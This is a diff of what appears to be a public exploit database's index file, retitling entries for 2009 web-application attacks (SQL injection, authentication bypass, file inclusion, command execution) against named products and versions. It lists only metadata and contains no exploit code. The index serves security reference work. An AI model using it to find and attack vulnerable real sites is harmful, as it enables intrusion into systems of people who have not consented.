-7689,platforms/php/webapps/7689.txt,"BlogHelper - 'common_db.inc' Remote Config File Disclosure",2009-01-06,ahmadbady,php,webapps,0
-7690,platforms/php/webapps/7690.txt,"PollHelper - 'poll.inc' Remote Config File Disclosure",2009-01-06,ahmadbady,php,webapps,0
+7687,platforms/php/webapps/7687.txt,"PlaySms 0.9.3 - Multiple Remote / Local File Inclusion",2009-01-06,ahmadbady,php,webapps,0
+7689,platforms/php/webapps/7689.txt,"BlogHelper - Remote Config File Disclosure",2009-01-06,ahmadbady,php,webapps,0
+7690,platforms/php/webapps/7690.txt,"PollHelper - Remote Config File Disclosure",2009-01-06,ahmadbady,php,webapps,0
 7691,platforms/php/webapps/7691.php,"Joomla! Component xstandard editor 1.5.8 - Local Directory Traversal",2009-01-07,irk4z,php,webapps,0
 7697,platforms/php/webapps/7697.txt,"PHP-Fusion Mod Members CV (job) 1.0 - SQL Injection",2009-01-07,"Khashayar Fereidani",php,webapps,0
 7698,platforms/php/webapps/7698.txt,"PHP-Fusion Mod E-Cart 1.3 - 'items.php' SQL Injection",2009-01-07,"Khashayar Fereidani",php,webapps,0
@@ -20447,17 +20450,17 @@ id,file,description,date,author,platform,type,port
 7703,platforms/php/webapps/7703.txt,"PHP-Fusion Mod vArcade 1.8 - (comment_id) SQL Injection",2009-01-08,"Khashayar Fereidani",php,webapps,0
 7704,platforms/php/webapps/7704.pl,"Pizzis CMS 1.5.1 - (visualizza.php idvar) Blind SQL Injection",2009-01-08,darkjoker,php,webapps,0
 7705,platforms/php/webapps/7705.pl,"XOOPS 2.3.2 - (mydirname) Remote PHP Code Execution",2009-01-08,StAkeR,php,webapps,0
-7711,platforms/php/webapps/7711.txt,"Fast FAQs System - (Authentication Bypass) SQL Injection",2009-01-09,x0r,php,webapps,0
+7711,platforms/php/webapps/7711.txt,"Fast FAQs System - Authentication Bypass",2009-01-09,x0r,php,webapps,0
 7716,platforms/php/webapps/7716.pl,"Joomla! Component com_xevidmegahd - 'catid' SQL Injection",2009-01-11,EcHoLL,php,webapps,0
 7717,platforms/php/webapps/7717.pl,"Joomla! Component com_jashowcase - 'catid' SQL Injection",2009-01-11,EcHoLL,php,webapps,0
 7718,platforms/php/webapps/7718.txt,"Joomla! Component com_newsflash - 'id' SQL Injection",2009-01-11,EcHoLL,php,webapps,0
-7719,platforms/php/webapps/7719.txt,"Fast Guest Book - (Authentication Bypass) SQL Injection",2009-01-11,Moudi,php,webapps,0
+7719,platforms/php/webapps/7719.txt,"Fast Guest Book - Authentication Bypass",2009-01-11,Moudi,php,webapps,0
 7722,platforms/php/webapps/7722.txt,"DZcms 3.1 - (products.php pcat) SQL Injection",2009-01-11,"Glafkos Charalambous",php,webapps,0
 7723,platforms/php/webapps/7723.txt,"Seo4SMF for SMF forums - Multiple Vulnerabilities",2009-01-11,WHK,php,webapps,0
 7724,platforms/php/webapps/7724.php,"phpMDJ 1.0.3 - (id_animateur) Blind SQL Injection",2009-01-11,darkjoker,php,webapps,0
 7725,platforms/php/webapps/7725.txt,"XOOPS Module tadbook2 - 'open_book.php book_sn' SQL Injection",2009-01-11,stylextra,php,webapps,0
-7726,platforms/php/webapps/7726.txt,"BKWorks ProPHP 0.50b1 - (Authentication Bypass) SQL Injection",2009-01-11,SirGod,php,webapps,0
-7728,platforms/php/webapps/7728.txt,"Weight Loss Recipe Book 3.1 - (Authentication Bypass) SQL Injection",2009-01-11,x0r,php,webapps,0
+7726,platforms/php/webapps/7726.txt,"BKWorks ProPHP 0.50b1 - Authentication Bypass",2009-01-11,SirGod,php,webapps,0
+7728,platforms/php/webapps/7728.txt,"Weight Loss Recipe Book 3.1 - Authentication Bypass",2009-01-11,x0r,php,webapps,0
 7729,platforms/php/webapps/7729.txt,"PHP-Fusion Mod the_kroax - 'comment_id' Parameter SQL Injection",2009-01-11,FasTWORM,php,webapps,0
 7730,platforms/php/webapps/7730.txt,"Social Engine - 'browse_classifieds.php s' SQL Injection",2009-01-11,snakespc,php,webapps,0
 7731,platforms/php/webapps/7731.txt,"fttss 2.0 - Remote Command Execution",2009-01-11,dun,php,webapps,0
@@ -20475,8 +20478,8 @@ id,file,description,date,author,platform,type,port
 7752,platforms/asp/webapps/7752.txt,"DMXReady News Manager 1.1 - Arbitrary Category Change",2009-01-13,ajann,asp,webapps,0
 7753,platforms/cgi/webapps/7753.pl,"HSPell 1.1 - (cilla.cgi) Remote Command Execution",2009-01-13,ZeN,cgi,webapps,0
 7754,platforms/asp/webapps/7754.txt,"DMXReady Account List Manager 1.1 - Contents Change",2009-01-13,ajann,asp,webapps,0
-7758,platforms/php/webapps/7758.txt,"Dark Age CMS 0.2c Beta - (Authentication Bypass) SQL Injection",2009-01-13,darkjoker,php,webapps,0
-7759,platforms/php/webapps/7759.txt,"Syzygy CMS 0.3 - (Authentication Bypass) SQL Injection",2009-01-14,darkjoker,php,webapps,0
+7758,platforms/php/webapps/7758.txt,"Dark Age CMS 0.2c Beta - Authentication Bypass",2009-01-13,darkjoker,php,webapps,0
+7759,platforms/php/webapps/7759.txt,"Syzygy CMS 0.3 - Authentication Bypass",2009-01-14,darkjoker,php,webapps,0
 7761,platforms/asp/webapps/7761.txt,"Netvolution CMS 1.0 - Cross-Site Scripting / SQL Injection",2009-01-14,Ellinas,asp,webapps,0
 7764,platforms/php/webapps/7764.txt,"DMXReady Blog Manager 1.1 - Remote File Delete",2009-01-14,ajann,php,webapps,0
 7766,platforms/asp/webapps/7766.txt,"DMXReady Catalog Manager 1.1 - Remote Contents Change",2009-01-14,ajann,asp,webapps,0
@@ -20506,13 +20509,13 @@ id,file,description,date,author,platform,type,port
 7796,platforms/php/webapps/7796.txt,"mkportal 1.2.1 - Multiple Vulnerabilities",2009-01-15,waraxe,php,webapps,0
 7797,platforms/php/webapps/7797.php,"Blue Eye CMS 1.0.0 - (clanek) Blind SQL Injection",2009-01-15,darkjoker,php,webapps,0
 7798,platforms/php/webapps/7798.txt,"Free Bible Search PHP Script - 'readbible.php' SQL Injection",2009-01-15,nuclear,php,webapps,0
-7800,platforms/asp/webapps/7800.txt,"eFAQ - (Authentication Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0
-7801,platforms/asp/webapps/7801.txt,"eReservations - (Authentication Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0
-7802,platforms/asp/webapps/7802.txt,"The Walking Club - (Authentication Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0
-7803,platforms/asp/webapps/7803.txt,"Ping IP - (Authentication Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0
+7800,platforms/asp/webapps/7800.txt,"eFAQ - Authentication Bypass",2009-01-16,ByALBAYX,asp,webapps,0
+7801,platforms/asp/webapps/7801.txt,"eReservations - Authentication Bypass",2009-01-16,ByALBAYX,asp,webapps,0
+7802,platforms/asp/webapps/7802.txt,"The Walking Club - Authentication Bypass",2009-01-16,ByALBAYX,asp,webapps,0
+7803,platforms/asp/webapps/7803.txt,"Ping IP - Authentication Bypass",2009-01-16,ByALBAYX,asp,webapps,0
 7805,platforms/php/webapps/7805.txt,"Rankem - File Disclosure / Cross-Site Scripting / Cookie",2009-01-16,Pouya_Server,php,webapps,0
 7806,platforms/php/webapps/7806.txt,"blogit! - SQL Injection / File Disclosure / Cross-Site Scripting",2009-01-16,Pouya_Server,php,webapps,0
-7807,platforms/asp/webapps/7807.txt,"ASP ActionCalendar 1.3 - (Authentication Bypass) SQL Injection",2009-01-16,SuB-ZeRo,asp,webapps,0
+7807,platforms/asp/webapps/7807.txt,"ASP ActionCalendar 1.3 - Authentication Bypass",2009-01-16,SuB-ZeRo,asp,webapps,0
 7809,platforms/php/webapps/7809.txt,"Aj Classifieds Real Estate 3.0 - Arbitrary File Upload",2009-01-16,ZoRLu,php,webapps,0
 7810,platforms/php/webapps/7810.txt,"Aj Classifieds Personals 3.0 - Arbitrary File Upload",2009-01-16,ZoRLu,php,webapps,0
 7811,platforms/php/webapps/7811.txt,"Aj Classifieds For Sale 3.0 - Arbitrary File Upload",2009-01-16,ZoRLu,php,webapps,0
@@ -20520,7 +20523,7 @@ id,file,description,date,author,platform,type,port
 7814,platforms/php/webapps/7814.txt,"BibCiter 1.4 - Multiple SQL Injections",2009-01-16,nuclear,php,webapps,0
 7815,platforms/php/webapps/7815.txt,"Joomla! Component Gigcal 1.x - 'id' SQL Injection",2009-01-18,Lanti-Net,php,webapps,0
 7816,platforms/asp/webapps/7816.txt,"DS-IPN.NET Digital Sales IPN - Database Disclosure",2009-01-18,Moudi,asp,webapps,0
-7817,platforms/php/webapps/7817.txt,"Click&Email - (Authentication Bypass) SQL Injection",2009-01-18,SuB-ZeRo,php,webapps,0
+7817,platforms/php/webapps/7817.txt,"Click&Email - Authentication Bypass",2009-01-18,SuB-ZeRo,php,webapps,0
 7818,platforms/php/webapps/7818.txt,"SCMS 1 - 'index.php p' Local File Inclusion",2009-01-18,ahmadbady,php,webapps,0
 7819,platforms/php/webapps/7819.txt,"ESPG (Enhanced Simple PHP Gallery) 1.72 - File Disclosure",2009-01-18,bd0rk,php,webapps,0
 7820,platforms/php/webapps/7820.pl,"Fhimage 1.2.1 - Remote Index Change Exploit",2009-01-19,Osirys,php,webapps,0
@@ -20547,7 +20550,7 @@ id,file,description,date,author,platform,type,port
 7851,platforms/php/webapps/7851.php,"Pardal CMS 0.2.0 - Blind SQL Injection",2009-01-22,darkjoker,php,webapps,0
 7859,platforms/php/webapps/7859.pl,"MemHT Portal 4.0.1 - Remote Code Execution",2009-01-25,StAkeR,php,webapps,0
 7860,platforms/php/webapps/7860.php,"Mambo Component 'com_sim' 0.8 - Blind SQL Injection",2009-01-25,"Mehmet Ince",php,webapps,0
-7861,platforms/asp/webapps/7861.txt,"Web-Calendar Lite 1.0 - (Authentication Bypass) SQL Injection",2009-01-25,ByALBAYX,asp,webapps,0
+7861,platforms/asp/webapps/7861.txt,"Web-Calendar Lite 1.0 - Authentication Bypass",2009-01-25,ByALBAYX,asp,webapps,0
 7862,platforms/php/webapps/7862.txt,"Flax Article Manager 1.1 - 'cat_id' SQL Injection",2009-01-25,JIKO,php,webapps,0
 7863,platforms/php/webapps/7863.txt,"OpenGoo 1.1 - (script_class) Local File Inclusion",2009-01-25,fuzion,php,webapps,0
 7864,platforms/php/webapps/7864.py,"EPOLL SYSTEM 3.1 - (Password.dat) Disclosure",2009-01-25,Pouya_Server,php,webapps,0
@@ -20560,7 +20563,7 @@ id,file,description,date,author,platform,type,port
 7877,platforms/php/webapps/7877.txt,"Wazzum Dating Software - (userid) SQL Injection",2009-01-26,nuclear,php,webapps,0
 7878,platforms/php/webapps/7878.txt,"Groone's GLink ORGanizer - 'index.php cat' SQL Injection",2009-01-26,nuclear,php,webapps,0
 7879,platforms/php/webapps/7879.pl,"SiteXS 0.1.1 - (type) Local File Inclusion",2009-01-26,darkjoker,php,webapps,0
-7880,platforms/php/webapps/7880.txt,"ClickAuction - (Authentication Bypass) SQL Injection",2009-01-26,R3d-D3V!L,php,webapps,0
+7880,platforms/php/webapps/7880.txt,"ClickAuction - Authentication Bypass",2009-01-26,R3d-D3V!L,php,webapps,0
 7881,platforms/php/webapps/7881.txt,"Joomla! Component com_flashmagazinedeluxe - (mag_id) SQL Injection",2009-01-26,TurkGuvenligi,php,webapps,0
 7883,platforms/php/webapps/7883.txt,"OpenX 2.6.3 - (MAX_type) Local File Inclusion",2009-01-26,"Charlie Briggs",php,webapps,0
 7884,platforms/php/webapps/7884.txt,"Flax Article Manager 1.1 - Remote PHP Script Upload",2009-01-27,S.W.A.T.,php,webapps,0
@@ -20580,10 +20583,10 @@ id,file,description,date,author,platform,type,port
 7908,platforms/php/webapps/7908.txt,"Star Articles 6.0 - (admin.manage) Remote Contents Change",2009-01-29,ByALBAYX,php,webapps,0
 7909,platforms/php/webapps/7909.txt,"Coppermine Photo Gallery 1.4.19 - Remote File Upload",2009-01-29,"Michael Brooks",php,webapps,0
 7911,platforms/php/webapps/7911.txt,"GLPI 0.71.3 - Multiple SQL Injections Vulnerabilities",2009-01-29,Zigma,php,webapps,0
-7916,platforms/php/webapps/7916.txt,"Netartmedia Car Portal 1.0 - (Authentication Bypass) SQL Injection",2009-01-29,"Mehmet Ince",php,webapps,0
+7916,platforms/php/webapps/7916.txt,"Netartmedia Car Portal 1.0 - Authentication Bypass",2009-01-29,"Mehmet Ince",php,webapps,0
 7917,platforms/php/webapps/7917.php,"PLE CMS 1.0 Beta 4.2 - (login.php school) Blind SQL Injection",2009-01-29,darkjoker,php,webapps,0
 7922,platforms/php/webapps/7922.txt,"Pligg CMS 9.9.5 - Cross-Site Request Forgery / Protection Bypass / Captcha Bypass",2009-01-29,"Michael Brooks",php,webapps,0
-7924,platforms/asp/webapps/7924.txt,"SalesCart - (Authentication Bypass) SQL Injection",2009-01-30,ByALBAYX,asp,webapps,0
+7924,platforms/asp/webapps/7924.txt,"SalesCart - Authentication Bypass",2009-01-30,ByALBAYX,asp,webapps,0
 7925,platforms/php/webapps/7925.txt,"Revou Twitter Clone - Cross-Site Scripting / SQL Injection",2009-01-30,nuclear,php,webapps,0
 7927,platforms/php/webapps/7927.txt,"GNUBoard 4.31.04 - (09.01.30) Multiple Local+Remote Vulnerabilities",2009-01-30,make0day,php,webapps,0
 7930,platforms/php/webapps/7930.txt,"bpautosales 1.0.1 - Cross-Site Scripting / SQL Injection",2009-01-30,"Mehmet Ince",php,webapps,0
@@ -20593,8 +20596,8 @@ id,file,description,date,author,platform,type,port
 7936,platforms/php/webapps/7936.txt,"sma-db 0.3.12 - Remote File Inclusion / Cross-Site Scripting",2009-02-02,ahmadbady,php,webapps,0
 7938,platforms/php/webapps/7938.txt,"Flatnux 2009-01-27 - Cross-Site Scripting / Iframe Injection (PoC)",2009-02-02,"Alfons Luja",php,webapps,0
 7939,platforms/php/webapps/7939.txt,"AJA Portal 1.2 (Windows) - Local File Inclusion",2009-02-02,ahmadbady,php,webapps,0
-7940,platforms/php/webapps/7940.txt,"WholeHogSoftware Ware Support - (Authentication Bypass) SQL Injection",2009-02-02,ByALBAYX,php,webapps,0
-7941,platforms/php/webapps/7941.txt,"WholeHogSoftware Password Protect - (Authentication Bypass) SQL Injection",2009-02-02,ByALBAYX,php,webapps,0
+7940,platforms/php/webapps/7940.txt,"WholeHogSoftware Ware Support - Authentication Bypass",2009-02-02,ByALBAYX,php,webapps,0
+7941,platforms/php/webapps/7941.txt,"WholeHogSoftware Password Protect - Authentication Bypass",2009-02-02,ByALBAYX,php,webapps,0
 7944,platforms/php/webapps/7944.php,"phpBLASTER 1.0 RC1 - (blaster_user) Blind SQL Injection",2009-02-02,darkjoker,php,webapps,0
 7945,platforms/php/webapps/7945.php,"CMS Mini 0.2.2 - Remote Command Execution",2009-02-02,darkjoker,php,webapps,0
 7946,platforms/php/webapps/7946.txt,"sourdough 0.3.5 - Remote File Inclusion",2009-02-02,ahmadbady,php,webapps,0
@@ -20604,14 +20607,14 @@ id,file,description,date,author,platform,type,port
 18164,platforms/android/webapps/18164.php,"Google Android - 'content://' URI Multiple Information Disclosure Vulnerabilities",2011-11-28,"Thomas Cannon",android,webapps,0
 7951,platforms/php/webapps/7951.txt,"WholeHogSoftware Ware Support - Insecure Cookie Handling",2009-02-03,Stack,php,webapps,0
 7952,platforms/php/webapps/7952.txt,"WholeHogSoftware Password Protect - Insecure Cookie Handling",2009-02-03,Stack,php,webapps,0
-7953,platforms/php/webapps/7953.txt,"ClickCart 6.0 - (Authentication Bypass) SQL Injection",2009-02-03,R3d-D3V!L,php,webapps,0
+7953,platforms/php/webapps/7953.txt,"ClickCart 6.0 - Authentication Bypass",2009-02-03,R3d-D3V!L,php,webapps,0
 7954,platforms/php/webapps/7954.txt,"groone glinks 2.1 - Remote File Inclusion",2009-02-03,"k3vin mitnick",php,webapps,0
 7955,platforms/php/webapps/7955.txt,"groone's Guestbook 2.0 - Remote File Inclusion",2009-02-03,"k3vin mitnick",php,webapps,0
-7956,platforms/php/webapps/7956.txt,"Online Grades 3.2.4 - (Authentication Bypass) SQL Injection",2009-02-03,x0r,php,webapps,0
+7956,platforms/php/webapps/7956.txt,"Online Grades 3.2.4 - Authentication Bypass",2009-02-03,x0r,php,webapps,0
 7959,platforms/php/webapps/7959.txt,"Simple Machines Forum (SMF) - 'BBCode' Cookie Stealing",2009-02-03,Xianur0,php,webapps,0
 7960,platforms/php/webapps/7960.txt,"AJA Modules Rapidshare 1.0.0 - Arbitrary File Upload",2009-02-03,"Hussin X",php,webapps,0
 7961,platforms/php/webapps/7961.php,"WEBalbum 2.4b - (photo.php id) Blind SQL Injection",2009-02-03,"Mehmet Ince",php,webapps,0
-7963,platforms/asp/webapps/7963.txt,"MyDesing Sayac 2.0 - (Authentication Bypass) SQL Injection",2009-02-03,Kacak,asp,webapps,0
+7963,platforms/asp/webapps/7963.txt,"MyDesing Sayac 2.0 - Authentication Bypass",2009-02-03,Kacak,asp,webapps,0
 7964,platforms/php/webapps/7964.txt,"4Site CMS 2.6 - Multiple SQL Injections",2009-02-03,D.Mortalov,php,webapps,0
 7965,platforms/php/webapps/7965.txt,"technote 7.2 - Remote File Inclusion",2009-02-03,make0day,php,webapps,0
 7967,platforms/php/webapps/7967.pl,"TxtBlog 1.0 Alpha - Remote Command Execution",2009-02-03,Osirys,php,webapps,0
@@ -20660,9 +20663,9 @@ id,file,description,date,author,platform,type,port
 8030,platforms/php/webapps/8030.txt,"Papoo CMS 3.x - (pfadhier) Local File Inclusion",2009-02-10,SirGod,php,webapps,0
 8031,platforms/php/webapps/8031.pph,"q-news 2.0 - Remote Command Execution",2009-02-10,Fireshot,php,webapps,0
 8032,platforms/php/webapps/8032.txt,"Potato News 1.0.0 - (user) Local File Inclusion",2009-02-10,x0r,php,webapps,0
-8033,platforms/php/webapps/8033.txt,"AuthPhp 1.0 - (Authentication Bypass) SQL Injection",2009-02-10,x0r,php,webapps,0
-8034,platforms/php/webapps/8034.txt,"Mynews 0_10 - (Authentication Bypass) SQL Injection",2009-02-10,x0r,php,webapps,0
-8035,platforms/php/webapps/8035.txt,"BlueBird Pre-Release - (Authentication Bypass) SQL Injection",2009-02-10,x0r,php,webapps,0
+8033,platforms/php/webapps/8033.txt,"AuthPhp 1.0 - Authentication Bypass",2009-02-10,x0r,php,webapps,0
+8034,platforms/php/webapps/8034.txt,"Mynews 0_10 - Authentication Bypass",2009-02-10,x0r,php,webapps,0
+8035,platforms/php/webapps/8035.txt,"BlueBird Pre-Release - Authentication Bypass",2009-02-10,x0r,php,webapps,0
 8036,platforms/php/webapps/8036.pl,"Fluorine CMS 0.1 rc 1 - File Disclosure / SQL Injection / Command Execution",2009-02-10,Osirys,php,webapps,0
 8038,platforms/php/webapps/8038.py,"TYPO3 < 4.0.12/4.1.10/4.2.6 - (jumpUrl) Remote File Disclosure",2009-02-10,Lolek,php,webapps,0
 8039,platforms/php/webapps/8039.txt,"SkaDate Online 7 - Arbitrary File Upload",2009-02-11,ZoRLu,php,webapps,0
@@ -20688,7 +20691,7 @@ id,file,description,date,author,platform,type,port
 8065,platforms/asp/webapps/8065.txt,"SAS Hotel Management System - 'myhotel_info.asp' SQL Injection",2009-02-16,Darkb0x,asp,webapps,0
 8066,platforms/php/webapps/8066.txt,"YACS CMS 8.11 - update_trailer.php Remote File Inclusion",2009-02-16,ahmadbady,php,webapps,0
 8068,platforms/php/webapps/8068.txt,"ravennuke 2.3.0 - Multiple Vulnerabilities",2009-02-16,waraxe,php,webapps,0
-8069,platforms/php/webapps/8069.txt,"Grestul 1.x - Authentication Bypass (via Cookie SQL Injection)",2009-02-16,x0r,php,webapps,0
+8069,platforms/php/webapps/8069.txt,"Grestul 1.x - Authentication Bypass (Cookie SQL Injection)",2009-02-16,x0r,php,webapps,0
 8070,platforms/asp/webapps/8070.txt,"SAS Hotel Management System - Arbitrary File Upload",2009-02-17,ZoRLu,asp,webapps,0
 8071,platforms/php/webapps/8071.txt,"S-CMS 1.1 Stable - Insecure Cookie Handling / Mass Page Delete Vulnerabilities",2009-02-17,x0r,php,webapps,0
 8072,platforms/php/webapps/8072.txt,"pHNews Alpha 1 - 'header.php mod' SQL Injection",2009-02-17,x0r,php,webapps,0
@@ -20707,10 +20710,10 @@ id,file,description,date,author,platform,type,port
 8095,platforms/php/webapps/8095.pl,"Pyrophobia 2.1.3.1 - Local File Inclusion Command Execution",2009-02-23,Osirys,php,webapps,0
 8098,platforms/php/webapps/8098.txt,"taifajobs 1.0 - (jobid) SQL Injection",2009-02-23,K-159,php,webapps,0
 8100,platforms/php/webapps/8100.pl,"MDPro Module My_eGallery - 'pid' SQL Injection",2009-02-23,StAkeR,php,webapps,0
-8101,platforms/php/webapps/8101.txt,"XGuestBook 2.0 - (Authentication Bypass) SQL Injection",2009-02-24,Fireshot,php,webapps,0
+8101,platforms/php/webapps/8101.txt,"XGuestBook 2.0 - Authentication Bypass",2009-02-24,Fireshot,php,webapps,0
 8104,platforms/php/webapps/8104.txt,"Qwerty CMS - 'id' SQL Injection",2009-02-24,b3,php,webapps,0
 8105,platforms/php/webapps/8105.txt,"pPIM 1.0 - Multiple Vulnerabilities",2009-02-25,"Justin Keane",php,webapps,0
-8107,platforms/asp/webapps/8107.txt,"PenPal 2.0 - (Authentication Bypass) SQL Injection",2009-02-25,ByALBAYX,asp,webapps,0
+8107,platforms/asp/webapps/8107.txt,"PenPal 2.0 - Authentication Bypass",2009-02-25,ByALBAYX,asp,webapps,0
 8109,platforms/asp/webapps/8109.txt,"SkyPortal Classifieds System 0.12 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0
 8110,platforms/asp/webapps/8110.txt,"SkyPortal Picture Manager 0.11 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0
 8111,platforms/asp/webapps/8111.txt,"SkyPortal WebLinks 0.12 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0
@@ -20718,7 +20721,7 @@ id,file,description,date,author,platform,type,port
 8113,platforms/asp/webapps/8113.txt,"DesignerfreeSolutions NewsLetter Manager Pro - Authentication Bypass",2009-02-26,ByALBAYX,asp,webapps,0
 8114,platforms/php/webapps/8114.txt,"Coppermine Photo Gallery 1.4.20 - (BBCode IMG) Privilege Escalation",2009-02-26,StAkeR,php,webapps,0
 8115,platforms/php/webapps/8115.pl,"Coppermine Photo Gallery 1.4.20 - (IMG) Privilege Escalation",2009-02-26,Inphex,php,webapps,0
-8116,platforms/php/webapps/8116.txt,"BannerManager 0.81 - (Authentication Bypass) SQL Injection",2009-02-26,rootzig,php,webapps,0
+8116,platforms/php/webapps/8116.txt,"BannerManager 0.81 - Authentication Bypass",2009-02-26,rootzig,php,webapps,0
 8120,platforms/asp/webapps/8120.txt,"SkyPortal Downloads Manager 1.1 - Remote Contents Change",2009-02-27,ByALBAYX,asp,webapps,0
 8123,platforms/php/webapps/8123.txt,"irokez blog 0.7.3.2 - Cross-Site Scripting / Remote File Inclusion / Blind SQL Injection",2009-02-27,Corwin,php,webapps,0
 8124,platforms/php/webapps/8124.txt,"Demium CMS 0.2.1b - Multiple Vulnerabilities",2009-02-27,Osirys,php,webapps,0
@@ -20793,7 +20796,7 @@ id,file,description,date,author,platform,type,port
 8290,platforms/php/webapps/8290.txt,"blogplus 1.0 - Multiple Local File Inclusion",2009-03-26,ahmadbady,php,webapps,0
 8291,platforms/php/webapps/8291.txt,"acute control panel 1.0.0 - SQL Injection / Remote File Inclusion",2009-03-26,SirGod,php,webapps,0
 8292,platforms/php/webapps/8292.txt,"Simply Classified 0.2 - (category_id) SQL Injection",2009-03-27,G4N0K,php,webapps,0
-8293,platforms/php/webapps/8293.txt,"Free PHP Petition Signing Script - (Authentication Bypass) SQL Injection",2009-03-27,Qabandi,php,webapps,0
+8293,platforms/php/webapps/8293.txt,"Free PHP Petition Signing Script - Authentication Bypass",2009-03-27,Qabandi,php,webapps,0
 8296,platforms/php/webapps/8296.txt,"Arcadwy Arcade Script - 'Username' Static Cross-Site Scripting",2009-03-27,"Anarchy Angel",php,webapps,0
 8297,platforms/php/webapps/8297.txt,"Moodle < 1.6.9/1.7.7/1.8.9/1.9.5 - File Disclosure",2009-03-27,"Christian J. Eibl",php,webapps,0
 8298,platforms/php/webapps/8298.pl,"My Simple Forum 7.1 - Remote Command Execution",2009-03-27,Osirys,php,webapps,0
@@ -20838,10 +20841,10 @@ id,file,description,date,author,platform,type,port
 8376,platforms/php/webapps/8376.php,"Geeklog 1.5.2 - SEC_authenticate() SQL Injection",2009-04-09,Nine:Situations:Group,php,webapps,0
 8377,platforms/asp/webapps/8377.pl,"Exjune Guestbook 2.0 - Remote Database Disclosure",2009-04-09,AlpHaNiX,asp,webapps,0
 8379,platforms/asp/webapps/8379.txt,"Back-End CMS 5.0 - (main.asp id) SQL Injection",2009-04-09,AnGeL25dZ,asp,webapps,0
-8380,platforms/php/webapps/8380.txt,"Simbas CMS 2.0 - (Authentication Bypass) SQL Injection",2009-04-09,"ThE g0bL!N",php,webapps,0
-8382,platforms/php/webapps/8382.txt,"WebFileExplorer 3.1 - (Authentication Bypass) SQL Injection",2009-04-09,Osirys,php,webapps,0
+8380,platforms/php/webapps/8380.txt,"Simbas CMS 2.0 - Authentication Bypass",2009-04-09,"ThE g0bL!N",php,webapps,0
+8382,platforms/php/webapps/8382.txt,"WebFileExplorer 3.1 - Authentication Bypass",2009-04-09,Osirys,php,webapps,0
 8383,platforms/php/webapps/8383.txt,"adaptbb 1.0b - Multiple Vulnerabilities",2009-04-09,"Salvatore Fresta",php,webapps,0
-8385,platforms/php/webapps/8385.txt,"My Dealer CMS 2.0 - (Authentication Bypass) SQL Injection",2009-04-09,"ThE g0bL!N",php,webapps,0
+8385,platforms/php/webapps/8385.txt,"My Dealer CMS 2.0 - Authentication Bypass",2009-04-09,"ThE g0bL!N",php,webapps,0
 8386,platforms/php/webapps/8386.txt,"Absolute Form Processor XE-V 1.5 - Authentication Bypass",2009-04-09,"ThE g0bL!N",php,webapps,0
 8387,platforms/php/webapps/8387.txt,"dynamic flash forum 1.0 Beta - Multiple Vulnerabilities",2009-04-09,"Salvatore Fresta",php,webapps,0
 8388,platforms/php/webapps/8388.txt,"PHP-Agenda 2.2.5 - Remote File Overwriting",2009-04-10,"Salvatore Fresta",php,webapps,0
@@ -20853,7 +20856,7 @@ id,file,description,date,author,platform,type,port
 8399,platforms/php/webapps/8399.pl,"Flatnuke 2.7.1 - (level) Privilege Escalation",2009-04-13,StAkeR,php,webapps,0
 8408,platforms/php/webapps/8408.txt,"X10media Mp3 Search Engine < 1.6.2 - Admin Access",2009-04-13,THUNDER,php,webapps,0
 8409,platforms/php/webapps/8409.txt,"Yellow Duck Weblog 2.1.0 - 'lang' Local File Inclusion",2009-04-13,ahmadbady,php,webapps,0
-8414,platforms/php/webapps/8414.txt,"XEngineSoft PMS/MGS/NM/Ams 1.0 - (Authentication Bypass) SQL Injection",2009-04-13,Dr-HTmL,php,webapps,0
+8414,platforms/php/webapps/8414.txt,"XEngineSoft PMS/MGS/NM/Ams 1.0 - Authentication Bypass",2009-04-13,Dr-HTmL,php,webapps,0
 8415,platforms/php/webapps/8415.txt,"FreznoShop 1.3.0 - 'id' SQL Injection",2009-04-13,NoGe,php,webapps,0
 8417,platforms/php/webapps/8417.txt,"e107 Plugin userjournals_menu - 'blog.id' SQL Injection",2009-04-13,boom3rang,php,webapps,0
 8418,platforms/php/webapps/8418.pl,"ASP Product Catalog 1.0 - (Cross-Site Scripting / File Disclosure) Multiple Remote Exploits",2009-04-13,AlpHaNiX,php,webapps,0
@@ -20874,7 +20877,7 @@ id,file,description,date,author,platform,type,port
 8443,platforms/php/webapps/8443.txt,"Job2C 4.2 - (adtype) Local File Inclusion",2009-04-15,ZoRLu,php,webapps,0
 8446,platforms/php/webapps/8446.txt,"FreeWebShop.org 2.2.9 RC2 - (lang_file) Local File Inclusion",2009-04-15,ahmadbady,php,webapps,0
 8448,platforms/php/webapps/8448.php,"Geeklog 1.5.2 - savepreferences()/*blocks[] SQL Injection",2009-04-16,Nine:Situations:Group,php,webapps,0
-8449,platforms/php/webapps/8449.txt,"NetHoteles 2.0/3.0 - (Authentication Bypass) SQL Injection",2009-04-16,Dns-Team,php,webapps,0
+8449,platforms/php/webapps/8449.txt,"NetHoteles 2.0/3.0 - Authentication Bypass",2009-04-16,Dns-Team,php,webapps,0
 8450,platforms/php/webapps/8450.txt,"Online Password Manager 4.1 - Insecure Cookie Handling",2009-04-16,ZoRLu,php,webapps,0
 8453,platforms/php/webapps/8453.txt,"webSPELL 4.2.0c - Bypass BBCode Cross-Site Scripting Cookie Stealing",2009-04-16,YEnH4ckEr,php,webapps,0
 8454,platforms/php/webapps/8454.txt,"DNS Tools (PHP Digger) - Remote Command Execution",2009-04-16,SirGod,php,webapps,0
@@ -20883,21 +20886,21 @@ id,file,description,date,author,platform,type,port
 8459,platforms/php/webapps/8459.htm,"eLitius 1.0 - (manage-admin.php) Add Admin/Change Password Exploit",2009-04-16,"ThE g0bL!N",php,webapps,0
 8460,platforms/php/webapps/8460.txt,"SMA-DB 0.3.13 - Multiple Remote File Inclusion",2009-04-16,JosS,php,webapps,0
 8461,platforms/php/webapps/8461.txt,"chCounter 3.1.3 - (Login Bypass) SQL Injection",2009-04-16,tmh,php,webapps,0
-8464,platforms/php/webapps/8464.txt,"Tiny Blogr 1.0.0 rc4 - (Authentication Bypass) SQL Injection",2009-04-17,"Salvatore Fresta",php,webapps,0
+8464,platforms/php/webapps/8464.txt,"Tiny Blogr 1.0.0 rc4 - Authentication Bypass",2009-04-17,"Salvatore Fresta",php,webapps,0
